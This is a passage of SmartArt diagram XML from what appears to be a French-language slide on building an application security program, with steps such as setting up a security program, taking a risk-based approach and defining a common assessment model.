    </dgm:pt>
    <dgm:pt modelId="{DE30B842-5C00-46E7-924F-4ED4BCAC119F}" type="parTrans" cxnId="{5BCE37A6-D490-402E-BED7-B266D56B4D42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61BE0B0A-057E-4602-B5F4-5CE5CF26BCAA}" type="sibTrans" cxnId="{5BCE37A6-D490-402E-BED7-B266D56B4D42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5" custScaleX="29803">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" type="pres">
      <dgm:prSet presAssocID="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA798A97-C42B-452A-B443-1F8731C07995}" type="pres">
      <dgm:prSet presAssocID="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDABB147-18BF-401D-8EC0-702E6AB23D86}" type="pres">
      <dgm:prSet presAssocID="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5" custScaleX="29803">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C575B74-7DD4-41BA-8F02-F58225FE5E47}" type="pres">
      <dgm:prSet presAssocID="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F8CEA5E-4B37-490B-9AE0-CDA5F17BE6F0}" type="pres">
      <dgm:prSet presAssocID="{C6F93B38-475D-4104-A89D-89CE58E7B1DF}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{676F7A36-6AAA-4955-A57F-DD1BC987CD57}" type="pres">
      <dgm:prSet presAssocID="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{844493EC-1BAE-4494-965B-BDA5EE224AC6}" type="pres">
      <dgm:prSet presAssocID="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5" custScaleX="29803">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CC3FFB7-CE4C-4C73-A032-35593748DB85}" type="pres">
      <dgm:prSet presAssocID="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD358220-5785-4B23-978F-F4E2C7042D8B}" type="pres">
      <dgm:prSet presAssocID="{48C4FD2A-4FFD-49E2-8C3B-E8FB5C35EE2E}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8F94A04-35D0-4E45-AB1C-3F08328A87D4}" type="pres">
      <dgm:prSet presAssocID="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DD3F871-F853-40F1-B9BB-E34640B0706D}" type="pres">
      <dgm:prSet presAssocID="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="29803">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CACE7D9A-45C4-46A3-9002-ACDB900C7D46}" type="pres">
      <dgm:prSet presAssocID="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBFB702B-7982-4C7E-A93C-B997F1F67BF5}" type="pres">
      <dgm:prSet presAssocID="{5EF82AA8-8580-4CBB-94BB-7D5D0BEBEECC}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24991520-C7CD-4F47-AA25-966865CCD1DF}" type="pres">
      <dgm:prSet presAssocID="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{573CF2CD-94C3-4404-8E22-47B8390B5477}" type="pres">
      <dgm:prSet presAssocID="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custScaleX="29803">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CBD60D3-72A4-4313-88D7-1B4D28AA9E08}" type="pres">
      <dgm:prSet presAssocID="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{0F0ED81E-E3C7-4DBA-9FB5-70910243745F}" type="presOf" srcId="{35005AD2-355F-4221-AFBE-62EE5EE8EED6}" destId="{6C575B74-7DD4-41BA-8F02-F58225FE5E47}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{820E1E9E-430D-44C7-9220-3F902A5D2586}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" srcOrd="3" destOrd="0" parTransId="{671B8E39-0FE0-4EFE-ADB5-69CAB59A0932}" sibTransId="{5EF82AA8-8580-4CBB-94BB-7D5D0BEBEECC}"/>
    <dgm:cxn modelId="{C45FB907-124C-4C9F-A49E-085723FFDEF1}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6780CAF4-082D-4706-A86B-7F871E8B2E8A}" type="presOf" srcId="{39F11DF5-92F1-4803-9176-8CE41A00F711}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EAA6F69C-B5ED-43A6-B7AF-84BF5CD6BBEC}" srcId="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" destId="{35005AD2-355F-4221-AFBE-62EE5EE8EED6}" srcOrd="0" destOrd="0" parTransId="{C9DFD859-7C28-4046-AE98-F24823BD2FCA}" sibTransId="{DC2A79BE-AD63-4ED9-B55E-16C3C2F46D7D}"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{6A4F78CA-D78E-45CA-B8B4-7035F35BD538}" type="presOf" srcId="{0527E629-D6A1-4D08-92A0-442047772A1B}" destId="{8CBD60D3-72A4-4313-88D7-1B4D28AA9E08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CCBBEF0D-7BB3-44EA-BD95-BCAEB8FA6D24}" srcId="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" destId="{E9B37935-A190-492F-89CA-C506985D7367}" srcOrd="0" destOrd="0" parTransId="{DF94F857-8D0F-453F-9A65-525077F420EA}" sibTransId="{07F02B5F-B548-4258-8893-06A8F8803A6E}"/>
    <dgm:cxn modelId="{D622C7C3-2A45-4CD5-8B2C-7145C736F391}" type="presOf" srcId="{41C02D83-CEEC-4620-A615-8B5A4D00B738}" destId="{CACE7D9A-45C4-46A3-9002-ACDB900C7D46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{059A1178-5F86-4CEF-8712-4EA49E6294DC}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{22F517B4-B2C5-4AA8-B81C-7654A9FCD2AF}" type="presOf" srcId="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" destId="{573CF2CD-94C3-4404-8E22-47B8390B5477}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FAEBE2FD-3F65-478D-9294-EAEBACE863EB}" type="presOf" srcId="{E9B37935-A190-492F-89CA-C506985D7367}" destId="{3CC3FFB7-CE4C-4C73-A032-35593748DB85}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A9C19672-C679-460C-9FE3-F6008C0FDA2E}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" srcOrd="2" destOrd="0" parTransId="{78BDE72E-320A-45A2-9C00-71C161400527}" sibTransId="{48C4FD2A-4FFD-49E2-8C3B-E8FB5C35EE2E}"/>
    <dgm:cxn modelId="{3FF9371B-77C8-4A7C-B63D-86B15286F6FB}" type="presOf" srcId="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" destId="{844493EC-1BAE-4494-965B-BDA5EE224AC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B9B967EE-9801-4D73-AD1E-74E3D6EEE0D5}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" srcOrd="4" destOrd="0" parTransId="{39506D7C-E801-4EF1-B6DE-EE6CE2183B0C}" sibTransId="{B0CC77F7-8370-4C79-B175-E8006AF5A824}"/>
    <dgm:cxn modelId="{5BCE37A6-D490-402E-BED7-B266D56B4D42}" srcId="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" destId="{0527E629-D6A1-4D08-92A0-442047772A1B}" srcOrd="0" destOrd="0" parTransId="{DE30B842-5C00-46E7-924F-4ED4BCAC119F}" sibTransId="{61BE0B0A-057E-4602-B5F4-5CE5CF26BCAA}"/>
    <dgm:cxn modelId="{F7B73C40-DD58-41F7-94EB-D126F6E5D054}" srcId="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" destId="{41C02D83-CEEC-4620-A615-8B5A4D00B738}" srcOrd="0" destOrd="0" parTransId="{5B8401E1-D1AE-4822-A27B-6C7F36490558}" sibTransId="{963C0D22-4492-41AE-A9A3-1E59F83BC07A}"/>
    <dgm:cxn modelId="{84FDDEC8-22DB-4184-9B5A-703E5CBE5595}" type="presOf" srcId="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" destId="{3DD3F871-F853-40F1-B9BB-E34640B0706D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B29B22A2-3156-48F5-A350-963380660B24}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" srcOrd="1" destOrd="0" parTransId="{C44C12F1-0403-475A-AE8F-FC6620291395}" sibTransId="{C6F93B38-475D-4104-A89D-89CE58E7B1DF}"/>
    <dgm:cxn modelId="{DDC2C771-D18B-4F81-9A8C-9226D30F1A3B}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{39F11DF5-92F1-4803-9176-8CE41A00F711}" srcOrd="0" destOrd="0" parTransId="{6A80C258-8448-4B2A-A29D-75B427DB2E14}" sibTransId="{0AC1C748-C2BF-49EE-BEA2-E40FA789A0EA}"/>
    <dgm:cxn modelId="{C7A22FDC-453E-471E-BE63-5AB619562531}" type="presOf" srcId="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" destId="{EDABB147-18BF-401D-8EC0-702E6AB23D86}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5922CE99-593C-4E5E-98AD-A950653A561F}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D6465171-CED9-4B3B-9998-07A97BE1448A}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1EE354A7-2FDB-472B-B9F3-B2341B8497B5}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DAA090F5-4ACE-484B-A0ED-4A1BA446DCCA}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1D408865-ECD4-43AC-86F5-0268E2AD804A}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{EA798A97-C42B-452A-B443-1F8731C07995}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AD77D462-DDAE-44A0-8DB7-7E47E002759F}" type="presParOf" srcId="{EA798A97-C42B-452A-B443-1F8731C07995}" destId="{EDABB147-18BF-401D-8EC0-702E6AB23D86}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{45C613E1-48B2-43E7-88A7-4D354C4ACAE9}" type="presParOf" srcId="{EA798A97-C42B-452A-B443-1F8731C07995}" destId="{6C575B74-7DD4-41BA-8F02-F58225FE5E47}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DF5B09BC-5DBC-4F7E-9E82-6BA95C4365A6}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{0F8CEA5E-4B37-490B-9AE0-CDA5F17BE6F0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{79B58DB1-B6D1-4668-A382-8EF1EE72C787}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{676F7A36-6AAA-4955-A57F-DD1BC987CD57}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9EAE9A20-CF0F-49A2-97C7-E757B4724773}" type="presParOf" srcId="{676F7A36-6AAA-4955-A57F-DD1BC987CD57}" destId="{844493EC-1BAE-4494-965B-BDA5EE224AC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D8B09837-32A7-4C0B-AAE3-AFCA55E9171C}" type="presParOf" srcId="{676F7A36-6AAA-4955-A57F-DD1BC987CD57}" destId="{3CC3FFB7-CE4C-4C73-A032-35593748DB85}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{10E4B0CA-E53D-4CC5-813C-379A7EFE4049}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{DD358220-5785-4B23-978F-F4E2C7042D8B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F6FD54B4-1C1C-41C6-8ED0-0EA56F199E9F}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8F94A04-35D0-4E45-AB1C-3F08328A87D4}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{39AE2169-F500-46F9-B426-D7E143E29C1E}" type="presParOf" srcId="{D8F94A04-35D0-4E45-AB1C-3F08328A87D4}" destId="{3DD3F871-F853-40F1-B9BB-E34640B0706D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{57E10661-3BF1-4CB1-9174-F7FEDDE081C3}" type="presParOf" srcId="{D8F94A04-35D0-4E45-AB1C-3F08328A87D4}" destId="{CACE7D9A-45C4-46A3-9002-ACDB900C7D46}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3E5CA665-DA15-4BBA-A7C2-2001B0C41E0C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{FBFB702B-7982-4C7E-A93C-B997F1F67BF5}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B8B2A7D9-7E98-4C70-A6B6-44C083C62795}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{24991520-C7CD-4F47-AA25-966865CCD1DF}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DEBFEC84-2252-45C1-917D-12FAD2BB7895}" type="presParOf" srcId="{24991520-C7CD-4F47-AA25-966865CCD1DF}" destId="{573CF2CD-94C3-4404-8E22-47B8390B5477}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B7A389F1-EBB2-421B-9785-1EF2A4EFFAEC}" type="presParOf" srcId="{24991520-C7CD-4F47-AA25-966865CCD1DF}" destId="{8CBD60D3-72A4-4313-88D7-1B4D28AA9E08}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>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smtClean="0"/>
            <a:t>Pour commencer</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>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algn="just"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>Etablissez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> un </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>programme</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t> de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>sécurisation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t> des applications</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> , et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>pilotez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>son adoption.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>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fr-FR" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>Approche </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>basée sur le risque</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>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algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Identifier et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>prioriser votre portefeuille d'applications </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>du point de vue du risque inhérent.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>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9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
            <a:t>Définissez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> un </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>modèle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>commun</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>d’évaluation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
